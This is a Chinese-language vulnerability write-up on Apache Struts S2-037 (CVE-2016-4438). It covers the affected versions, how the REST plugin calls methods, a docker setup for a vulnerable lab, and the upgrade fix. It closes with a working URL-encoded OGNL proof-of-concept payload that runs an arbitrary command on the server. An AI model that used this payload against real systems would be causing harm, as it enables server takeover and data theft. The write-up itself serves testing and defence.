一、漏洞基本信息
CVE编号:CVE-2016-4438
漏洞名称:Struts(S2-037)远程代码执行
漏洞发布日期:2016.615
受影响的软件及系统:Apache struts 2.3.20 - 2.3.28.1 版本使用了REST插件的用户
漏洞概述:Apache Struts 2是世界上最流行的Java Web服务器框架之一。Apache Struts2在使用REST插件的情况下,攻击者使用REST调用恶意表达式可以远程执行代码。该漏洞编号为CVE-2016-4438,目前命名为S2-037。,黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。
rest介绍:
使用http://localhost:8080/bee/action-name/1/XXX这种请求方式,其实XXX可以是任何合法的名字
Struts2会查找XXX为名字的方法来调用,比如请求http://localhost:8080/bee/test/1/abc,那么TestAction的public String abc()就会被调用
攻击者可以使用REST插件调用恶意表达式实现远程执行代码。
漏洞修复&解决方案:升级到 Structs 2.3.29
二、漏洞环境搭建&测试
2.1 docker拉取镜像到本地
docker pull medicean/vulapps:s_struts2_s2-037
2.2 启动环境
docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-037
2.3 访问http://ip:80
POC:command处输入想要执行的命令,这里举例为id
(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=id
